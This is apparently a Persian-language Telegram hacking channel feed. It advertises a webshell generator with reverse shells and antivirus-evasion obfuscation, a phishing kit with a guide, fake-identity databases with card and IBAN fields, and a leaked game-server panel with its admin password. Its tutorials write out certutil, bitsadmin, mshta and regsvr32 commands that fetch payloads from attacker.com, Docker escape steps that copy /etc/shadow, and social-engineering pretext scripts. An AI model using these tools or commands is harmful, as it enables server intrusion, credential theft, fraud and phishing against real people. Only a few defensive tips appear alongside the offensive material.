Spire Team
5.12K subscribers
71 photos
3 videos
92 files
174 links
> 🛡️ Ethical Hacking | Cyber Security
پاینده ایران و ایرانی
💻 Learn • Practice • Secure
🔐 Ethical & Educational Content Only
✅ We respect and follow Telegram's rules
🚫 No illegal or unauthorized activities
👤 @durov
Download Telegram
SSH server Ubuntu.html
10.7 KB
شبیه‌ساز فیک سرور Ubuntu
❤5
Shell 🐚 Generator.html
41.4 KB
Shell Generator 🐚 DarkPacket

یک ابزار، هشت زبان
PHP · ASP · JSP · Node.js · Python · Perl · Ruby · Bash

هر زبان قابلیت‌های مخصوص خودش رو داره — از اجرای فرمان و eval تا شل معکوس، بایند شل، MySQL Dump و Thread Enumeration

پشتیبانی از کلید ساده، MD5 و SHA1 با پارامتر تصادفی

قابلیت‌های پرقدرت: اجرای فرمان · لیست فایل · خواندن/نوشتن · آپلود/دانلود · اطلاعات سرور · کوئری SQL · شل معکوس · بایند شل · زیپ · خودتخریبی · خروجی زنده · کپی یک‌کلیکی · دانلود خودکار با پسوند صحیح · راهنمای هوشمند برای هر زبان · شش لایه مبهم‌سازی Base64 · Hex · XOR · Split · Combo · None برای دور زدن WAF و آنتی‌ویروس
❤6
user-agents-100000.txt
11.9 MB
دیتابیس عظیم و بسیار قدرتمندی که شامل مجموعه‌ای کامل از ۱۰۰ هزار User-Agent سالم، معتبر و به‌روز است.

این پایگاه داده با ارائه طیف وسیعی از شناسه‌های کاربری استاندارد و غیراستاندارد، امکان شبیه‌سازی دقیق ترافیک وب را فراهم می‌کند و برای توسعه‌دهندگان، برنامه‌نویسان و متخصصان امنیت سایبری که نیاز به تست‌های جامع پراکسی، اسکریپت‌نویسی خودکار یا تحلیل رفتار مرورگرها دارند، منبعی ایده‌آل و غنی به شمار می‌رود.
‌
all_ipv4_500ips.zip
210.8 KB
دیتابیس ارائه‌شده شامل مجموعه‌ای بسیار گسترده و جامع از آدرس‌های اینترنتی نسخه چهار (IPv4) است که پوشش‌دهی جغرافیای آن به ۹۵ کشور مختلف در سراسر جهان گسترش دارد.

این پایگاه داده با ارائه اطلاعات دقیق و به‌روز، امکان شناسایی و تحلیل منبع ترافیک از نقاط مختلف جهان را فراهم می‌کند. به‌عنوان یک نمونه از ظرفیت و تنوع این دیتابیس، می‌توان به وجود حداقل ۵۰۰ آدرس IP منحصر‌به‌فرد و فعال برای هر یک از کشورهای ذکرشده اشاره کرد؛ این حجم از داده‌ها نشان‌دهنده عمق و گستردگی پوشش‌دهی شبکه‌ای در سطح بین‌المللی است و برای پروژه‌هایی که نیازمند تحلیل جغرافیایی ترافیک یا مدیریت دسترسی‌ها بر اساس موقعیت مکانی کاربران هستند، ابزاری ارزشمند و کارآمد به شمار می‌رود.
‌
all_ipv6_500ips.zip
551.4 KB
دیتابیس ارائه‌شده شامل مجموعه‌ای بسیار گسترده و جامع از آدرس‌های اینترنتی نسخه چهار (IPv6) است که پوشش‌دهی جغرافیای آن به ۹۲ کشور مختلف در سراسر جهان گسترش دارد.

این پایگاه داده با ارائه اطلاعات دقیق و به‌روز، امکان شناسایی و تحلیل منبع ترافیک از نقاط مختلف جهان را فراهم می‌کند. به‌عنوان یک نمونه از ظرفیت و تنوع این دیتابیس، می‌توان به وجود حداقل ۵۰۰ آدرس IP منحصر‌به‌فرد و فعال برای هر یک از کشورهای ذکرشده اشاره کرد؛ این حجم از داده‌ها نشان‌دهنده عمق و گستردگی پوشش‌دهی شبکه‌ای در سطح بین‌المللی است و برای پروژه‌هایی که نیازمند تحلیل جغرافیایی ترافیک یا مدیریت دسترسی‌ها بر اساس موقعیت مکانی کاربران هستند، ابزاری ارزشمند و کارآمد به شمار می‌رود.
‌
fake_identities_10countries_10cities_100pergender_2026-09-11.zip
15.3 MB
دیتابیس بسیار قوی شامل ۲۰ هزار اطلاعات داینامیک برای هویت جعلی.

۱۰ کشور: ایران، روسیه، آمریکا، آلمان، فرانسه، انگلیس، ژاپن، برزیل، هند، چین.
شهرهای واقعی: تهران، Москва و Los Angeles.

[PERSONAL]: مشخصات فردی
First Name: نام کوچک واقعی بر اساس کشور و جنسیت
Last Name: نام خانوادگی واقعی بر اساس کشور
Full Name: نام کامل
Gender: Male یا Female
Age: بین ۱۸ تا ۲۶ سال
Birth Year: سال تولد
Nationality: نام کشور

[CONTACT]: اطلاعات تماس
Email: ساخته‌شده از نام و فامیل
Phone: شماره با کد کشور، مثلاً +98 912 345 6789
Phone (Raw): شماره بدون فرمت

Street: خیابان و پلاک بر اساس خیابان‌های واقعی هر کشور
City: شهر
Postal Code: با الگوی واقعی هر کشور، مثلاً ایران ۱۰ رقم و آمریکا ۵ رقم
Country: کشور

[NETWORK]: اطلاعات شبکه
IPv4: با پیشوند شبیه کشور، مثلاً 5.x.x.x برای ایران
MAC Address: آدرس مک تصادفی

[MISC]: اطلاعات متفرقه
Username: نام کاربری
Password: رمز عبور تصادفی
Credit Card: شماره کارت ساختگی با پیشوند ۴
IBAN: شماره شبا ساختگی

‌
proxies-1786199678869.txt
59.7 KB
بیش‌از ۱ هزار پروکسی CORS قدرتمند استخراج شده از سایت corsproxy.io
ports.compact.json
822.4 KB
تمام (۶۵۵۳۵) پورت‌های جهان + سرویس ارائه دهنده‌ی آنها در قالب JSON
DigitalIdentityProfiles (1) (1).zip
25.4 MB
مخزن اطلاعات قدرتمند برای جعل اطلاعات

۲۰ کشور، هر کشور ۵ شهر، هر شهر ۳ سرویس‌دهنده IP، هر سرویس ۲۵ دستگاه txt و ۲۵ دستگاه json.
مجموعاً ۱۵ هزار دستگاه به دو فرمت.
panel.html
141.6 KB
پنل دیتابیس سرور بازی امپراتوری پارس
این پنل، توسط کاربر @Net_activenull استخراج و منتشر شده است.

رمز دسترسی به پنل مدیریت:
empire2024

برای افزایش سطح امنیت شبکه و جلوگیری از دسترسی‌های غیرمجاز، این بسته شامل ۲۰۰ عدد پروکسی CORS می‌باشد که امکان استفاده امن و مخفیانه از سرویس‌ها را فراهم می‌کند.

توجه داشته باشید که این محتوا صرفاً با هدف آموزشی و آشنایی با ساختارهای امنیتی ارائه شده است. مسئولیت هرگونه سوءاستفاده، دسترسی غیرمجاز یا استفاده نادرست از این اطلاعات بر عهده کاربر نهایی بوده و هیچ‌گونه ارتباطی با تولیدکنندگان محتوا ندارد.
NLP.html
127.3 KB
ربات قدرتمند Nullspire Ai

قابلیت‌های گسترده و پیشرفته:
- دسترسی نامحدود به ۵۳ API عمومی و معتبر: این ربات با اتصال به منابع اطلاعاتی کلیدی مانند گیت‌هاب (GitHub) برای مدیریت کدها و پروژه‌ها، ویکی‌پدیا (Wikipedia) برای دسترسی به دانش عمومی، و همچنین مجموعه‌ای از سایت‌های تخصصی اطلاعاتی و پایگاه‌های داده، امکان جمع‌آوری و پردازش حجم عظیمی از داده‌ها را فراهم می‌سازد.
- ابزارهای حرفه‌ای OSINT (هوش‌یابی منابع باز): Nullspire Ai مجهز به موتورهای جستجوی هوشمند است که فرآیند جمع‌آوری اطلاعات از منابع باز را به‌شکل خودکار و دقیق تسهیل می‌کند. این قابلیت برای تحلیل‌های عمیق، پایش اخبار و کشف اطلاعات پنهان بسیار مؤثر است.
- شخصی‌سازی بالا و انعطاف‌پذیری: کاربران می‌توانند با تنظیمات دقیق و شخصی‌سازی شده، رفتار ربات را مطابق با نیازهای خاص خود تنظیم کنند تا خروجی‌ها کاملاً متناسب با اهداف آن‌ها باشد.
- قدرت پردازش و سرعت بالا: با پشتیبانی از پردازش هم‌زمان درخواست‌ها و پاسخ‌گویی سریع، Nullspire Ai برای انجام پروژه‌های بزرگ و پیچیده ایده‌آل است.
❤5
sensitive-paths (2).zip
87.6 KB
Sensitive Path Wordlist Collection
مجموعه کامل مسیرها و payloadهای حساس برای تست نفوذ وب - نسخه 2026

فایل‌ها: 23
مسیرها: ۳٬۸۶۵
CVE: 307
❤7
Fishing_Monitor.html
64.4 KB
فایل کامل شامل نمونه کد فیشینگ وب، پنل مدیریتی و آموزش گام‌به‌گام که همه درون یک فایل واحد قرار دارند.

توجه داشته باشید که مسئولیت هرگونه سوءاستفاده یا استفاده غیرمجاز از این محتوا بر عهده کاربر است و ما هیچ مسئولیتی در قبال اقدامات شما نمی‌پذیریم.
❤8
عزیزان، ری‌اکشن ها رو بترکونید... 😂🌹
همین‌طوری که من کانال رو ترکوندم... 😂
❤13
پورت‌هایی که هر هکری باید حفظ باشه

یه سری پورت هست که دیدنشون یعنی یه جای کار می‌لنگه.

۲۱ FTP
اگه باز باشه و Anonymous Login فعال باشه، یعنی فاجعه.
ftp target.com
یوزر: anonymous
پسورد: خالی

۲۲ SSH
هدف شماره یک Brute Force.
اگه پسورد ضعیف باشه، تو چند دقیقه کرک میشه.

۲۳ Telnet
کاملاً ناامن. همه چی Plain Text.
حتی پسورد هم رمزنگاری نشده.
جایگزینش: SSH

۲۵ SMTP
اگه Open Relay باشه، می‌تونی با اون ایمیل اسپم بفرستی.
یعنی سرور تو رو به عنوان پل استفاده می‌کنه.

۴۴۵ SMB
هدف EternalBlue و WannaCry.
اگه ویندوز قدیمی و پچ نشده باشه، فاجعه.

۳۳۰۶ MySQL
اگه از بیرون باز باشه و پسورد root خالی باشه:
mysql -h target.com -u root
مستقیم می‌ری تو دیتابیس.

۳۳۸۹ RDP
هدف BlueKeep.
اگه ویندوز XP یا 7 باشه، اکسپلویت آماده‌ست.

۵۹۰۰ VNC
معمولاً پسورد کوتاه یا بدون پسورد.
مستقیم کنترل دسکتاپ.

نکته:
nmap -sV -p 21,22,23,25,445,3306,3389,5900 target.com

#ℳℴ𝒷𝒾𝓃
❤8
چطور بفهمیم یه سایت HTTPS واقعیه یا قلابی

همه فکر می‌کنن قفل کنار آدرس یعنی سایت امنه.
ولی فیشینگ‌ها هم می‌تونن قفل داشته باشن.

اول: دامنه رو حرف به حرف بخون

paypal.com با paypa1.com
google.com با goog1e.com
microsoft.com با rnicrosoft.com

بعضی حروف تو فونت‌های خاص شبیه همن.
m با rn، l با I، O با 0.

دوم: گواهی SSL رو چک کن

کلیک کن روی قفل، View Certificate رو بزن.
صادرکننده کی؟ Let's Encrypt عادیه.
تاریخ انقضا؟
اسم دامنه دقیقاً همونیه؟

سوم: از ابزار استفاده کن

curl -vI https://example.com 2>&1 | grep -i "subject\|issuer\|expire"

چهارم: گوگل Safe Browsing

برو به:
https://transparencyreport.google.com/safe-browsing/search

دامنه رو بذار، ببین قرمز نیست.

نکته طلایی:
اگه لینکی تو ایمیل یا پیامک اومد، هیچ‌وقت مستقیم کلیک نکن.
دستی تو مرورگر تایپ کن.

#ℳℴ𝒷𝒾𝓃
❤6
Living off the Land، هنر استفاده از خود ویندوز

هکرهای آماتور بدافزار میارن تو سیستم.
حرفه‌ای‌ها از خود ابزارهای ویندوز استفاده می‌کنن.

چرا؟

چون این ابزارها خود ویندوزن.
آنتی‌ویروس بهشون شک نمی‌کنه.
لاگ‌ها هم میگن "یه برنامه رسمی مایکروسافت اجرا شد".

نمونه‌هاش:

certutil -urlcache -f http://attacker.com/payload.exe
یه ابزار رسمی ویندوزه که برای دانلود گواهی طراحی شده.
ولی می‌تونی باهاش هر فایلی دانلود کنی.

bitsadmin /transfer job http://attacker.com/file.exe C:\temp\file.exe
سرویس رسمی ویندوز برای دانلود آپدیت.
می‌تونی ازش برای دانلود هر چیزی استفاده کنی.

mshta http://attacker.com/script.hta
اجرای اسکریپت از راه دور.
هیچ فایلی رو دیسک ذخیره نمیشه.

regsvr32 /s /n /u /i:http://attacker.com/file.sct scrobj.dll
اجرای اسکریپت از راه دور.
با یه DLL رسمی ویندوز.

wmic process call create "cmd /c payload"
اجرای پروسه از راه دور.

برای همین میگن، بدافزار مدرن لازم نیست فایل باشه.
کافیه از خود ویندوز استفاده کنی.

#ℳℴ𝒷𝒾𝓃
❤8
Container Escape، فرار از داکر

فرض کن یه اپلیکیشن وب رو هک کردی که تو داکر اجرا میشه.
حالا داخل کانتینری. ولی هدف، خود میزبانه.

راه‌های فرار:

۱. دسترسی به Docker Socket
اگه /var/run/docker.sock تو کانتینر مانت شده باشه:

docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu
حالا کل هارد میزبان رو داری.

۲. Privileged Container
اگه کانتینر با --privileged اجرا شده:

mount /dev/sda1 /mnt
chroot /mnt
حالا root میزبان هستی.

۳. Kernel Exploit
اگه نسخه کرنل آسیب‌پذیر باشه،
از داخل کانتینر، کرنل رو اکسپلویت می‌کنی.
مثل Dirty COW, Dirty Pipe.

۴. cgroup Escape
اگه cgroup v1 باشه و release_agent قابل نوشتن:

echo '#!/bin/sh' > /tmp/exploit.sh
echo 'cat /etc/shadow > /tmp/shadow' >> /tmp/exploit.sh
chmod +x /tmp/exploit.sh
echo /tmp/exploit.sh > /sys/fs/cgroup/release_agent

۵. CAP_SYS_ADMIN
اگه این Capability رو داشته باشی:

mount -t cgroup -o rdma cgroup /tmp/cgrp
یه سری تنظیمات، بعد فرار.

دفاع:
کانتینر رو non-root اجرا کن.
--privileged رو حذف کن.
Docker Socket رو داخل کانتینر نذار.
از Seccomp و AppArmor استفاده کن.

#ℳℴ𝒷𝒾𝓃
❤6
آسیب‌پذیری‌های منطقی، بدترین نوع باگ

بعضی باگ‌ها تکنیکی نیستن.
فقط یه فکر اشتباه تو منطق برنامه‌ست.

مثال ۱: کد تخفیف

یه فروشگاه آنلاین کد تخفیف داره: OFF50
وقتی می‌زنی، ۵۰٪ تخفیف می‌گیری.
حالا اگه یه بار دیگه بزنی چی میشه؟

بعضی سایت‌ها چک نمی‌کنن که کد قبلاً استفاده شده یا نه.
پس می‌تونی بی‌نهایت تخفیف بگیری.

مثال ۲: تغییر قیمت

وقتی یه محصول رو به سبد اضافه می‌کنی،
قیمت تو یه فیلد مخفی تو فرم ذخیره میشه.

حالا اگه قیمت رو از ۱۰۰۰ به ۱ تغییر بدی چی؟
بعضی سایت‌ها قیمت رو از سمت کاربر می‌خونن.
یعنی تو می‌تونی محصول رو یه تومان بخری.

مثال ۳: تغییر ID

example.com/order/1234

اگه 1234 رو به 1235 تغییر بدی چی؟
اگه سفارش کاربر دیگه رو ببینی، یعنی IDOR داری.
یعنی دسترسی کنترل درست پیاده نشده.

مثال ۴: پنل ادمین مخفی

example.com/admin

اگه صفحه لود نشد، یعنی فقط بر اساس URL چک می‌کنه.
اگه با یه هدر خاص بفرستی، شاید لود شه.
X-Forwarded-For: 127.0.0.1

چون خیلی از سرورها فکر می‌کنن درخواست از لوکاله.

#ℳℴ𝒷𝒾𝓃
❤6
مهندسی اجتماعی، حمله به انسان نه سیستم

بعضی وقتا نیازی نیست سیستمی رو هک کنی.
کافیه آدمش رو هک کنی.

۱. Pretexting
یه داستان می‌سازی که قابل باور باشه.
مثلاً خودت رو از IT شرکت جا می‌زنی و می‌گی:
"سلام، ما یه مشکل امنیتی تو سیستم شما دیدیم، برای تأیید، پسورد فعلی رو بگید."

۲. Baiting
یه فلش تو پارکینگ شرکت می‌ندازی.
روش نوشته: "حقوق کارمندان ۱۴۰۳"
کارمند پیدا می‌کنه، فلش رو می‌زنه به سیستم.
بدافزار اجرا میشه.

۳. Tailgating
پشت یه کارمند وارد ساختمان اداری میشی.
دست پرته، کارتت رو می‌زنی، بعد تو هم رد میشی.
هیچ‌کس نمی‌پرسه تو کی هستی.

۴. Quid Pro Quo
یه تماس می‌گیری، خودت رو از پشتیبانی جا می‌زنی.
می‌گی: "ما یه مشکل داریم، اگه کمک کنی یه تخفیف ویژه می‌گیری."

۵. Vishing
پیام صوتی می‌فرستی، خودت رو بانک جا می‌زنی.
"حساب شما مشکوک به کلاهبرداریه، برای تأیید شماره کارت رو بگید."

دفاع:
هیچ‌وقت اطلاعات حساس رو تلفنی یا ایمیلی ندید.
همیشه هویت طرف رو از راه دیگه چک کنید.
آموزش کارمندان مهم‌ترین لایه امنیته.

#ℳℴ𝒷𝒾𝓃
❤7